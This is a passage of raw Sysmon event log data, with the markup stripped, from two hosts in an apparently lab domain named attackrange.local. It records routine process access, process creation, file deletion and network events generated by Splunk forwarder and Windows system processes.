Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8104E5C9CC4F40D8F3527E33A9E937A3,SHA256=7DE18199D3A271BB769FCC699846501F2C910B4B5CA52E4588A68FE4D33EEEF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291648Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.802{BEA10069-0276-6088-FC29-00000000BB01}36285680C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291647Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0276-6088-FC29-00000000BB01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291646Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291645Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291644Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291643Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291642Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291641Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291640Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291639Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291638Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291637Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-0276-6088-FC29-00000000BB01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291636Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.670{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0276-6088-FC29-00000000BB01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291635Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.671{BEA10069-0276-6088-FC29-00000000BB01}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440580Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:22.267{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24C73448D7795DE9085627340F9F507F,SHA256=6BC64AF13DA349435C25EDBAF1AA468A4A4B8CBEB1418C0EBEEA2BF87DE21876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440579Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:22.266{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E868B3A36121BF6D3346783FD21D0924,SHA256=71BE5935FD1958C062E376D44CBA353FD3C08D950ABD5D4FE3F2812122C75689,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440578Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:22.206{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440577Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:22.206{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291664Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.888{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2096B9730622A67CE8021DC68CBA0654,SHA256=D240042DBB1C44F20E95C4EE18A6E11061E2D7A3478D0B7A3BC06FFE15A1BEDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440586Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:20.420{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62413-false10.0.1.12-8089- 23542300x8000000000000000440585Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:23.345{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFB8C8030E31938D916BF5D7F19596C1,SHA256=BDB63427DBC78E8013FB4D3810E097D0BEE826E3A302A76B476750A47D254747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291663Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.688{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAAF9A8E06FF19E94BCA4D044F5270B5,SHA256=32FA4A890C52CDD4C2C43361F06DB4F9249584801E54FCB966FE8328D2347B7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291662Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-0277-6088-FD29-00000000BB01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291661Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291660Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291659Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291658Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291657Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291656Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:23.341{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291655Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 